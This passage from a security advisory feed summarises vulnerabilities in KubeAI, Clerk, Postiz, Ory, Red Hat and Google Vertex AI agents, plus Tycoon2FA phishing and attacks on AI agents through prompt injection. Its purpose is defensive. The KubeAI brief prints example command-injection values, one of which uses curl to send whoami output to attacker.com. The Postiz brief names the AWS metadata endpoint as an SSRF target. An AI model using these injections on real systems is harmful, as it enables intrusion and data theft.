<code>modelParam</code>). These components are extracted from the Model custom resource URL. An attacker who can create or update <code>Model</code> custom resources can inject arbitrary shell commands, which are then executed within the model server pods. This occurs because the extracted URL components are not sanitized before being interpolated into a shell command executed by <code>bash -c</code>. Successful exploitation allows attackers to compromise the model serving infrastructure and potentially access sensitive information or execute commands on the underlying host.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains the ability to create or update <code>Model</code> custom resources in a KubeAI environment. This could be through compromised credentials, misconfigured RBAC permissions, or other vulnerabilities.</li>
<li>The attacker crafts a malicious <code>Model</code> custom resource with a specially crafted URL in the <code>spec.url</code> field. The URL contains shell metacharacters and commands within the <code>ref</code> component or the <code>model</code> query parameter. For example, <code>ollama://registry.example.com/model;id&gt;/tmp/pwned;echo</code> or <code>pvc://my-pvc?model=qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo</code>.</li>
<li>The attacker applies the malicious <code>Model</code> resource to the Kubernetes cluster, triggering the KubeAI model controller.</li>
<li>The <code>parseModelURL()</code> function parses the malicious URL and extracts the unsanitized <code>ref</code> and <code>modelParam</code> components.</li>
<li>The <code>ollamaStartupProbeScript()</code> function constructs a shell command string using <code>fmt.Sprintf</code> with the unsanitized <code>ref</code> and <code>modelParam</code> components. The resulting command is intended to pull or copy the specified model.</li>
<li>The KubeAI model controller creates a pod for the model server, configuring a startup probe that executes the crafted shell command via <code>bash -c</code>.</li>
<li>The Kubernetes kubelet executes the startup probe, running the attacker-injected shell commands within the pod&rsquo;s context.</li>
<li>The attacker achieves arbitrary command execution inside the model server pod, potentially leading to data exfiltration, lateral movement, or compromise of the model serving infrastructure.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows for arbitrary command execution within KubeAI model server pods. This can lead to several severe consequences: data exfiltration from the pod&rsquo;s environment (environment variables, mounted secrets, service account tokens), lateral movement to other cluster resources in multi-tenant environments, and compromise of the model serving infrastructure. An attacker with Model creation permissions can execute arbitrary commands in model pods, potentially accessing sensitive data. The vulnerability affects KubeAI installations version 0.23.1 and earlier.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade KubeAI to a version beyond 0.23.1 that includes the fix for CVE-2026-34940.</li>
<li>Implement strict RBAC policies to limit who can create or update <code>Model</code> custom resources.</li>
<li>Deploy the Sigma rule &ldquo;Detect KubeAI Model Resource Command Injection&rdquo; to identify malicious <code>Model</code> resources being created or updated.</li>
<li>Monitor Kubernetes audit logs for suspicious activity related to <code>Model</code> custom resource creation and updates.</li>
<li>If upgrading is not immediately feasible, consider implementing a Kubernetes admission webhook that validates and sanitizes the <code>spec.url</code> field of <code>Model</code> custom resources, allowing only alphanumeric characters, slashes, colons, dots, and hyphens.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kubeai</category><category>command-injection</category><category>kubernetes</category><category>cloud</category></item><item><title>Weaponization of Google Vertex AI Agents</title><link>https://feed.craftedsignal.io/briefs/2026-04-vertex-ai-compromise/</link><pubDate>Wed, 01 Apr 2026 07:43:16 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-vertex-ai-compromise/</guid><description>Researchers demonstrated that AI agents built on Google's Vertex AI can be compromised to exfiltrate data, create backdoors, and compromise infrastructure by abusing excessive permissions of the Per-Project, Per-Product Service Agent (P4SA).</description><content:encoded><![CDATA[<p>Palo Alto Networks researchers have detailed their analysis of Google Cloud Platform’s Vertex AI, specifically focusing on the Vertex Agent Engine and the Agent Development Kit (ADK). The research demonstrates how AI agents built on this platform can be weaponized. The core issue revolves around the Per-Project, Per-Product Service Agent (P4SA), which is associated with user-deployed AI agents. The researchers found that the default permissions of P4SA are excessive, allowing attackers to gain unauthorized access to the Google project hosting Vertex AI. This exploitation enables malicious activities such as data exfiltration, backdoor creation, and broader infrastructure compromise. Google has since revised its documentation and recommends using Bring Your Own Service Account (BYOSA) to enforce least-privilege execution, mitigating the identified risks.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AI agent built on Vertex AI.</li>
<li>The attacker exploits the excessive default permissions associated with the Per-Project, Per-Product Service Agent (P4SA).</li>
<li>The attacker obtains the GCP service agent&rsquo;s credentials by abusing the P4SA permissions.</li>
<li>Using the compromised credentials, the attacker moves from the AI agent&rsquo;s execution context into the owner&rsquo;s Google Cloud project.</li>
<li>The attacker gains unrestricted access to the Google project hosting Vertex AI.</li>
<li>The attacker downloads container images from private repositories that form the core of the Vertex AI Reasoning Engine.</li>
<li>The attacker accesses restricted Artifact Registry repositories containing other images.</li>
<li>The attacker identifies and manipulates a file within the agent&rsquo;s environment to achieve remote code execution and establish a persistent backdoor.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The successful exploitation of Vertex AI agents allows attackers to exfiltrate sensitive data, establish persistent backdoors, and potentially compromise the entire Google Cloud project. This can lead to exposure of Google&rsquo;s intellectual property through access to the Vertex AI Reasoning Engine&rsquo;s container images. Furthermore, attackers can gain access to restricted Artifact Registry repositories and Google Cloud Storage buckets containing potentially sensitive information. The impact includes data breaches, intellectual property theft, and potential disruption of critical services running on the compromised infrastructure.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement Bring Your Own Service Account (BYOSA) for Agent Engine to enforce the principle of least privilege, as recommended by Google.</li>
<li>Monitor service account activity within Google Cloud Platform for anomalous behavior indicative of credential compromise and lateral movement.</li>
<li>Deploy the Sigma rule to detect attempts to download container images from private repositories after potential P4SA compromise.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cloud</category><category>ai</category><category>vertex-ai</category><category>privilege-escalation</category></item><item><title>Tycoon2FA Phishing-as-a-Service Platform Persists After Takedown</title><link>https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-persistence/</link><pubDate>Sun, 29 Mar 2026 08:34:23 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-persistence/</guid><description>The Tycoon2FA phishing-as-a-service (PhaaS) platform, used to bypass MFA and compromise email accounts, saw a temporary decrease in activity after a law enforcement takedown, but cloud compromises have since returned to pre-disruption levels with unchanged TTPs, indicating continued threat actor activity.</description><content:encoded><![CDATA[<p>On March 4, 2026, Europol announced a technical disruption of Tycoon2FA, a subscription-based phishing-as-a-service (PhaaS) platform enabling cybercriminals to bypass MFA and compromise email accounts. The takedown involved seizing 330 domains. Despite this disruption, CrowdStrike observed only a short-term decrease in Tycoon2FA campaign activity. The volume of cloud compromises has since returned to pre-disruption levels, and Tycoon2FA’s tactics, techniques, and procedures (TTPs) remain unchanged. This resurgence suggests that the actors behind Tycoon2FA are adaptive and persistent. Tycoon2FA began operations in 2023, and in mid-2025, it was responsible for 62% of all phishing attempts blocked by Microsoft, generating over 30 million malicious emails in a single month. The platform also had a competitor named RaccoonO365, which law enforcement took down in September 2025.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Victims receive phishing emails designed to mimic legitimate login pages.</li>
<li>Phishing emails direct victims to Tycoon2FA CAPTCHA pages hosted on attacker-controlled domains.</li>
<li>Upon CAPTCHA validation, victims&rsquo; session cookies are stolen by the attackers.</li>
<li>A JavaScript (JS) file extracts victims&rsquo; email addresses.</li>
<li>Victims are redirected to fake Microsoft 365 or Google login pages hosted on a Tycoon2FA domain.</li>
<li>Victims enter their credentials into the fake login pages, which are then captured by the attackers.</li>
<li>Stolen credentials are proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.</li>
<li>Attackers authenticate to the victim&rsquo;s cloud environment using the stolen cookies and credentials, gaining unauthorized access.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Tycoon2FA was responsible for 62% of all phishing attempts blocked by Microsoft in mid-2025, generating over 30 million malicious emails in a single month. Successful attacks lead to unauthorized access to victims&rsquo; cloud environments, potentially resulting in data theft, business email compromise (BEC), and further malicious activities. Despite law enforcement takedowns, the platform&rsquo;s rapid resurgence demonstrates the resilience of PhaaS operations and their potential for significant damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor network traffic for connections to known phishing domains or newly registered domains, correlating with user agent strings and HTTP referrer headers common in phishing kits, to detect initial access attempts. Deploy the network_connection Sigma rule to identify suspicious connections.</li>
<li>Implement detections for suspicious JavaScript execution within browser environments attempting to steal session cookies or extract email addresses. Enable webserver and proxy logging to capture these events and deploy the process_creation Sigma rule to identify associated processes.</li>
<li>Monitor authentication logs for successful logins from unusual locations or using suspicious user agents after a user has visited a known phishing site. Analyze user authentication patterns and correlate with other security events to detect compromised accounts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>phishing</category><category>credential-theft</category><category>cloud</category></item><item><title>CrowdStrike Innovations Secure AI Agents and Govern Shadow AI</title><link>https://feed.craftedsignal.io/briefs/2026-03-shadow-ai-governance/</link><pubDate>Sat, 28 Mar 2026 21:52:45 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-shadow-ai-governance/</guid><description>CrowdStrike is introducing innovations to secure AI agents and govern shadow AI across endpoints, SaaS, and cloud environments by extending AI detection and response (AIDR) capabilities to cover desktop AI applications and provide visibility into AI-related components, helping to prevent prompt attacks, data leaks, and policy violations.</description><content:encoded><![CDATA[<p>CrowdStrike is addressing the emerging threat landscape created by the rapid adoption of AI tools and agents within organizations. The increasing use of personal AI agents, particularly on developer machines, introduces new attack vectors such as &ldquo;living off the AI land&rdquo; (LOTAIL) exploits, indirect prompt injection, and agentic tool chain attacks. The rise of shadow AI, where employees adopt AI tools without oversight, exacerbates the issue. CrowdStrike&rsquo;s new innovations extend AI Detection and Response (AIDR) capabilities to cover desktop AI applications (ChatGPT, Gemini, Claude, DeepSeek, Microsoft Copilot, O365 Copilot, GitHub Copilot, and Cursor) and expand platform capabilities to secure AI workforce adoption and development across endpoints, SaaS environments, and cloud environments. Falcon AIDR will leverage the Falcon sensor to enable deployment of the Falcon AIDR browser extension from the Falcon console and obtain desktop application telemetry via the sensor&rsquo;s container network interface capability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access (via AI Agent):</strong> An attacker gains initial access by compromising an AI agent running on an endpoint, potentially through prompt injection or other vulnerabilities in the agent&rsquo;s design.</li>
<li><strong>Privilege Escalation:</strong> The attacker leverages the compromised AI agent&rsquo;s existing system permissions, which may be elevated, to gain further access to the system. AI agents often have high privileges to execute terminal commands, browse the web, and interact with files.</li>
<li><strong>Living off the AI Land (LOTAIL):</strong> The attacker uses the compromised AI agent to perform malicious actions that appear as legitimate user behavior, such as executing terminal commands, browsing websites, or interacting with files.</li>
<li><strong>Lateral Movement:</strong> The attacker utilizes the AI agent&rsquo;s network connectivity to discover and access other systems within the network, including LLM runtimes, MCP servers, and IDE extensions.</li>
<li><strong>Data Exfiltration:</strong> The attacker uses the AI agent to exfiltrate sensitive data from the compromised systems, such as source code, credentials, or other confidential information.</li>
<li><strong>Supply Chain Compromise:</strong> The attacker uses access to development environments via compromised AI tools to introduce malicious code into the software supply chain.</li>
<li><strong>Policy Violation:</strong> The attacker manipulates the AI agent to violate content policies or access control rules, potentially leading to unauthorized access to sensitive data or systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful attacks targeting AI agents and shadow AI can lead to significant data breaches, intellectual property theft, and supply chain compromises. The lack of visibility and governance over AI deployments creates a growing attack surface that traditional security controls are ill-equipped to handle. Compromised AI agents can be used to perform a wide range of malicious activities, including data exfiltration, lateral movement, and the introduction of malicious code into the software supply chain. The impact can range from financial losses and reputational damage to the compromise of critical infrastructure and sensitive government systems.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AI Desktop Application Usage Detected&rdquo; to identify and monitor the use of AI desktop applications such as ChatGPT, Gemini, and others within your environment. This rule uses <code>process_creation</code> logs to detect the execution of these applications (see rule below).</li>
<li>Enable and configure AI Discovery in CrowdStrike Falcon Exposure Management to gain visibility into AI-related components running across endpoints, including AI apps, LLM runtimes, MCP servers, and IDE extensions. This leverages <code>Falcon for IT</code> telemetry as described in the overview.</li>
<li>Implement Falcon AIDR policies to monitor and protect agents built in Microsoft Copilot Studio against prompt injection attacks, data leaks, and policy violations.</li>
<li>Review and update access control policies for AI agents to minimize the potential impact of a compromise, focusing on the principle of least privilege.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>AI</category><category>AI-Security</category><category>Shadow-AI</category><category>Endpoint-Security</category><category>SaaS</category><category>Cloud</category></item><item><title>Clerk SSRF Vulnerability in frontendApiProxy Allows Secret Key Leakage</title><link>https://feed.craftedsignal.io/briefs/2026-03-clerk-ssrf/</link><pubDate>Sat, 28 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-clerk-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in the `clerkFrontendApiProxy` function of the `@clerk/backend` package, allowing an unauthenticated attacker to send the application's `Clerk-Secret-Key` to an attacker-controlled server.</description><content:encoded><![CDATA[<p>The <code>clerkFrontendApiProxy</code> function in <code>@clerk/backend</code> versions 3.0.0 through 3.2.2, <code>@clerk/express</code> versions 2.0.0 through 2.0.6, <code>@clerk/hono</code> versions 0.1.0 through 0.1.4, and <code>@clerk/fastify</code> versions 3.1.0 through 3.1.4 is susceptible to a Server-Side Request Forgery (SSRF) vulnerability. This flaw enables an unauthenticated attacker to craft malicious request paths that, when processed by the proxy, result in the application&rsquo;s <code>Clerk-Secret-Key</code> being transmitted to a server under the attacker&rsquo;s control. Only applications that have explicitly enabled the <code>frontendApiProxy</code> feature are affected. This feature is not enabled by default, limiting the scope of potential impact. Notably, <code>@clerk/nextjs</code> users are not affected due to the framework&rsquo;s handling of repeated slashes in request paths, which mitigates the vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies an application that has the <code>frontendApiProxy</code> feature enabled and is running a vulnerable version of <code>@clerk/backend</code>, <code>@clerk/express</code>, <code>@clerk/hono</code>, or <code>@clerk/fastify</code>.</li>
<li>The attacker crafts a malicious HTTP request targeting the proxy endpoint (<code>/__clerk/</code> by default). The request path includes double slashes or other path manipulation techniques to bypass intended routing logic.</li>
<li>The vulnerable <code>clerkFrontendApiProxy</code> function processes the crafted request without proper sanitization or validation of the request path.</li>
<li>Due to the SSRF vulnerability, the proxy makes an internal request to an unintended destination, potentially including an attacker-controlled server.</li>
<li>The application&rsquo;s <code>Clerk-Secret-Key</code> is inadvertently included in the headers or body of the internal request made by the proxy.</li>
<li>The attacker-controlled server receives the request containing the <code>Clerk-Secret-Key</code>.</li>
<li>The attacker extracts the <code>Clerk-Secret-Key</code> from the captured request.</li>
<li>With the compromised <code>Clerk-Secret-Key</code>, the attacker can impersonate the application, access protected resources, or perform other unauthorized actions within the Clerk ecosystem.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows an attacker to obtain the <code>Clerk-Secret-Key</code> of a vulnerable application. While internal logs from Clerk show no evidence of active exploitation, the potential impact of a compromised secret key is significant. An attacker with the key can impersonate the application, potentially leading to unauthorized access to user data, modification of application settings, or other malicious activities. The severity is further heightened because a successful attack can occur without authentication.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to the patched version of <code>@clerk/backend</code> (3.2.3), <code>@clerk/express</code> (2.0.7), <code>@clerk/hono</code> (0.1.5), or <code>@clerk/fastify</code> (3.1.5) immediately if you are using the <code>frontendApiProxy</code> feature.</li>
<li>Rotate your Clerk Secret Key in the <a href="https://dashboard.clerk.com">Clerk Dashboard</a> under <strong>API Keys</strong> after upgrading to mitigate potential compromise, as recommended by the advisory.</li>
<li>Audit access logs for requests to your proxy endpoint (<code>/__clerk/</code> by default) containing double slashes in the path to detect potential exploitation attempts.</li>
<li>Deploy the Sigma rule provided below to identify requests with double slashes to the Clerk proxy endpoint.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>vulnerability</category><category>clerk</category><category>cloud</category></item><item><title>CrowdStrike Falcon Cloud Security Introduces Adversary-Informed Risk Prioritization</title><link>https://feed.craftedsignal.io/briefs/2026-03-cnapp-risk-prioritization/</link><pubDate>Sat, 28 Mar 2026 09:26:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-cnapp-risk-prioritization/</guid><description>CrowdStrike's Falcon Cloud Security enhances CNAPP capabilities by introducing adversary-informed risk prioritization, application layer visibility, and root cause analysis of configuration changes, enabling security teams to better understand and remediate cloud risks.</description><content:encoded><![CDATA[<p>CrowdStrike Falcon Cloud Security has introduced new Cloud Native Application Protection Platform (CNAPP) capabilities focused on improving risk assessment and remediation in cloud environments. The updates address limitations such as lack of application layer visibility, ignoring adversary behavior, and difficulty in tracing the origin of exposures. Falcon Cloud Security now incorporates Application Explorer, providing application-layer visibility, and adversary intelligence, aligning risk prioritization with known threat actor behaviors (like LABYRINTH CHOLLIMA and SCATTERED SPIDER) and observed intrusion patterns. Additionally, it provides insights into the configuration changes leading to identified exposures. These enhancements aim to provide security teams with better context, enabling them to understand cloud risk, prioritize remediation efforts, and accelerate the transition from detection to action.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Compromise:</strong> An organization&rsquo;s cloud infrastructure is misconfigured, creating an overly permissive access control to a storage resource containing customer PII.</li>
<li><strong>Discovery:</strong> An adversary, potentially aligned with a group like LABYRINTH CHOLLIMA or SCATTERED SPIDER, identifies the misconfigured storage resource through reconnaissance activities.</li>
<li><strong>Lateral Movement:</strong> The adversary uses the initial access to move laterally within the cloud environment, exploiting existing roles and permissions.</li>
<li><strong>Privilege Escalation:</strong> The adversary elevates privileges to gain access to sensitive applications, exploiting vulnerabilities or misconfigurations.</li>
<li><strong>Data Access:</strong> The attacker accesses applications connected to the storage resource, including business-critical applications processing payment information.</li>
<li><strong>Data Exfiltration:</strong> The adversary exfiltrates sensitive customer PII from the storage resource, taking advantage of the permissive access controls.</li>
<li><strong>Impact:</strong> The exfiltrated data is used for malicious purposes, such as identity theft or financial fraud, leading to financial and reputational damage for the targeted organization.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The enhanced CNAPP capabilities aim to reduce the likelihood and impact of cloud breaches. In 2025, cloud intrusions by state-nexus threat actors surged by 266%. Successfully exploiting cloud misconfigurations can lead to significant data breaches, financial losses, and reputational damage. Organizations across various sectors, especially financial services, are at risk. Failure to prioritize and remediate cloud risks can result in the compromise of business-critical applications and sensitive data, including personally identifiable information (PII).</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Prioritize deployment of Falcon Cloud Security to gain application-layer visibility and identify infrastructure risks impacting critical applications as described in the <strong>Overview</strong>.</li>
<li>Utilize the adversary intelligence feature in Falcon Cloud Security to prioritize risk remediation based on known threat actor behavior, specifically focusing on groups like <strong>LABYRINTH CHOLLIMA and SCATTERED SPIDER</strong> as mentioned in the <strong>Overview</strong>.</li>
<li>Implement the following Sigma rule to detect anomalous access to cloud storage resources.</li>
<li>Enable and review cloud configuration logs to identify misconfigurations leading to overly permissive access controls, enabling faster remediation and prevention of future exposures, as described in the <strong>Attack Chain</strong>.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>cnapp</category><category>risk-prioritization</category></item><item><title>Postiz App SSRF Vulnerability via Next.js</title><link>https://feed.craftedsignal.io/briefs/2026-03-postiz-ssrf/</link><pubDate>Fri, 27 Mar 2026 15:46:53 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-postiz-ssrf/</guid><description>A high-severity SSRF vulnerability exists in the Postiz application via Next.js, allowing attackers to bypass firewalls, scan internal networks, access sensitive cloud metadata (AWS IMDS), potentially leak instance credentials, and pivot within the internal network.</description><content:encoded><![CDATA[<p>The Postiz application, a web application built with Next.js, is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability (CVE-2024-34351) allows an attacker to force the server to make HTTP requests to arbitrary domains. Exploitation can lead to internal network reconnaissance, access to sensitive cloud metadata, and potential credential theft. The vulnerability affects Postiz versions 2.0.12 and earlier. Users are advised to upgrade to version 2.21.1 to mitigate the risk. The primary concern is unauthorized access to internal resources and sensitive data through manipulated server-side requests.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable endpoint in the Postiz application that accepts a URL as input.</li>
<li>The attacker crafts a malicious URL pointing to an internal resource, such as <code>http://169.254.169.254/latest/meta-data/</code>.</li>
<li>The Postiz server, without proper validation, makes an HTTP request to the specified URL.</li>
<li>If successful, the server retrieves the requested data from the internal resource.</li>
<li>The server returns the retrieved data to the attacker in the HTTP response.</li>
<li>The attacker obtains sensitive information such as AWS instance metadata, including IAM roles and access keys.</li>
<li>The attacker uses the compromised credentials to pivot into other AWS resources or the internal network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful SSRF attack can have significant consequences. Attackers can bypass firewall restrictions to scan and interact with internal network services, potentially discovering sensitive information and exploiting further vulnerabilities. Accessing cloud metadata services like AWS IMDS allows for the theft of instance credentials, enabling attackers to compromise other AWS resources and escalate their privileges. This vulnerability can lead to a full compromise of the internal network environment where Postiz is hosted, potentially impacting all services and data within that environment.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Postiz to version v2.21.1 to patch the SSRF vulnerability as recommended by the vendor.</li>
<li>Deploy the Sigma rule &ldquo;Detect SSRF Attempt to AWS IMDS&rdquo; to identify attempts to access the AWS metadata service (169.254.169.254) via HTTP requests.</li>
<li>Monitor web server logs for unusual outbound HTTP requests to internal IP addresses and private networks, specifically those originating from the Postiz application.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>vulnerability</category><category>cloud</category></item><item><title>Ory Polis DOM-based XSS Vulnerability (CVE-2026-33506)</title><link>https://feed.craftedsignal.io/briefs/2024-01-ory-polis-xss/</link><pubDate>Thu, 26 Mar 2026 19:17:05 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-ory-polis-xss/</guid><description>Ory Polis versions prior to 26.2.0 are vulnerable to DOM-based XSS due to improper handling of the `callbackUrl` parameter, allowing attackers to execute arbitrary JavaScript in a user's browser.</description><content:encoded><![CDATA[<p>Ory Polis, formerly known as BoxyHQ Jackson, is a service that bridges or proxies SAML login flows to OAuth 2.0 or OpenID Connect. A DOM-based Cross-Site Scripting (XSS) vulnerability has been identified in versions of Ory Polis prior to 26.2.0. This vulnerability arises from the application&rsquo;s improper trust of the <code>callbackUrl</code> URL parameter within its login functionality. An attacker can exploit this by crafting a malicious link containing JavaScript code within the <code>callbackUrl</code>. When a…</p>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>xss</category><category>ory-polis</category><category>cve-2026-33506</category><category>cloud</category></item><item><title>Ory Kratos SQL Injection Vulnerability in ListCourierMessages API</title><link>https://feed.craftedsignal.io/briefs/2024-01-ory-kratos-sqli/</link><pubDate>Thu, 26 Mar 2026 18:16:30 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-ory-kratos-sqli/</guid><description>A SQL injection vulnerability exists in the ListCourierMessages Admin API of Ory Kratos versions prior to 26.2.0 due to flaws in its pagination implementation, allowing attackers to craft malicious tokens if the pagination secret is known or the default secret is used.</description><content:encoded><![CDATA[<p>Ory Kratos, an identity, user management, and authentication system for cloud services, is vulnerable to SQL injection in versions prior to 26.2.0. The vulnerability resides within the ListCourierMessages Admin API and stems from flaws in its pagination implementation. The pagination tokens are encrypted using a secret configured in <code>secrets.pagination</code>. Attackers who obtain this secret can forge malicious tokens, leading to SQL injection attacks. Critically, if this configuration value remains unset, Kratos defaults to a publicly known pagination encryption secret. This allows attackers to manually generate valid malicious pagination tokens for vulnerable installations. Defenders should immediately configure a custom value for <code>secrets.pagination</code> using a cryptographically secure random secret and upgrade Kratos to version 26.2.0 or later.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies an Ory Kratos instance running a version prior to 26.2.0.</li>
<li>Attacker checks the Kratos configuration to determine if <code>secrets.pagination</code> is set.</li>
<li>If <code>secrets.pagination</code> is not set, the attacker leverages the publicly known default pagination encryption secret.</li>
<li>The attacker crafts a malicious pagination token containing SQL injection payloads. This token exploits the vulnerable pagination logic in the <code>ListCourierMessages</code> API.</li>
<li>Attacker sends a request to the <code>/admin/courier/messages</code> endpoint with the crafted pagination token in the <code>page_token</code> parameter.</li>
<li>The Kratos application processes the malicious token, leading to the execution of arbitrary SQL queries against the underlying database.</li>
<li>The SQL injection allows the attacker to potentially read, modify, or delete sensitive data within the Kratos database, including user credentials, configuration settings, or other confidential information.</li>
<li>The attacker may use the compromised data for further attacks, such as account takeover or privilege escalation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SQL injection vulnerability can lead to complete compromise of the Ory Kratos instance. This can result in unauthorized access to user accounts, disclosure of sensitive information, and potential data manipulation or deletion. The severity is high due to the potential for significant data breach and service disruption impacting all users managed by the compromised Kratos instance. The number of victims depends on the size and user base of the affected Ory Kratos deployment.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately configure a custom value for <code>secrets.pagination</code> by generating a cryptographically secure random secret within your Ory Kratos configuration (reference: Overview section).</li>
<li>Upgrade Ory Kratos to version 26.2.0 or later to patch the SQL injection vulnerability (reference: Overview section).</li>
<li>Monitor web server logs for suspicious requests to the <code>/admin/courier/messages</code> endpoint containing unusually long or malformed <code>page_token</code> parameters (create a custom rule based on this behavior).</li>
<li>Implement a Web Application Firewall (WAF) rule to block requests with suspicious SQL syntax in the <code>page_token</code> parameter targeting the <code>/admin/courier/messages</code> endpoint.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ory-kratos</category><category>sql-injection</category><category>cve-2026-33503</category><category>cloud</category></item><item><title>RedHat Multicluster Engine for Kubernetes Privilege Escalation Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-07-redhat-privesc/</link><pubDate>Wed, 25 Mar 2026 10:22:04 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-07-redhat-privesc/</guid><description>A local attacker can exploit a vulnerability in RedHat Multicluster Engine for Kubernetes to escalate privileges.</description><content:encoded><![CDATA[<p>A vulnerability exists within the RedHat Multicluster Engine for Kubernetes that allows a local attacker to escalate their privileges. The specific details of the vulnerability are not disclosed in this advisory, but successful exploitation would grant the attacker elevated permissions within the Kubernetes environment. This issue affects deployments of RedHat Multicluster Engine, potentially impacting the security and integrity of containerized applications and the underlying infrastructure. Defenders should investigate and apply the appropriate patches or mitigations as soon as they become available.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial local access to a system running RedHat Multicluster Engine for Kubernetes, possibly through compromised credentials or an existing vulnerability.</li>
<li>The attacker identifies the specific vulnerable component within the RedHat Multicluster Engine.</li>
<li>The attacker crafts a malicious payload designed to exploit the vulnerability.</li>
<li>The attacker executes the payload locally on the compromised system, targeting the vulnerable component.</li>
<li>Successful exploitation grants the attacker elevated privileges within the Kubernetes environment.</li>
<li>The attacker leverages the escalated privileges to access sensitive resources or perform unauthorized actions within the Kubernetes cluster.</li>
<li>The attacker may attempt to further compromise other nodes or services within the cluster.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a local attacker to escalate their privileges within a RedHat Multicluster Engine for Kubernetes environment. This can lead to unauthorized access to sensitive data, compromise of containerized applications, and potential disruption of services. The impact could range from data breaches to complete cluster takeover, depending on the scope of the attacker&rsquo;s activities after privilege escalation.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process creation events for suspicious activity within the Kubernetes environment that may indicate exploitation attempts (see generic process creation rules).</li>
<li>Investigate any unexpected privilege escalations or changes in user permissions within the RedHat Multicluster Engine environment.</li>
<li>As details emerge, deploy specific detection rules to identify exploitation of the RedHat Multicluster Engine vulnerability within your environment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kubernetes</category><category>privilege-escalation</category><category>cloud</category></item><item><title>Red Hat OpenShift GitOps Multiple Vulnerabilities</title><link>https://feed.craftedsignal.io/briefs/2026-03-openshift-gitops-vulns/</link><pubDate>Wed, 25 Mar 2026 10:21:36 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-openshift-gitops-vulns/</guid><description>An anonymous remote attacker can exploit multiple vulnerabilities in Red Hat OpenShift GitOps to manipulate data, misrepresent information, or cause a denial of service.</description><content:encoded><![CDATA[<p>Red Hat OpenShift GitOps is susceptible to multiple vulnerabilities that can be exploited by an anonymous remote attacker. The vulnerabilities can lead to data manipulation, misrepresentation of information, or a denial-of-service condition. Given the widespread adoption of OpenShift in cloud environments, these vulnerabilities pose a significant risk to organizations relying on the platform for application deployment and management. Successful exploitation could lead to unauthorized modification of application configurations, leading to compromised deployments and potentially impacting service availability. Defenders should prioritize patching and implementing mitigations to prevent exploitation of these vulnerabilities.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Red Hat OpenShift GitOps instance accessible remotely.</li>
